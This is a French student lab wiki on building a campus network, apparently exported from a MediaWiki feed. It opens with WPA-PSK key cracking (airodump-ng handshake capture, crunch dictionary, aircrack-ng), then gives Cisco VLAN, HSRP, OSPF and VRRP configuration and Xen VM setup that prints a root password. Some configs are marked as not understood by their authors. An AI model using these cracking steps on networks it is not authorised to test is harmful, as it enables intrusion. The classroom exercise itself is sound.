BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51215</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51215"/>
				<updated>2019-11-28T08:01:26Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* le fichier /etc/bind/db.ima2a5-rex4ever.site */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
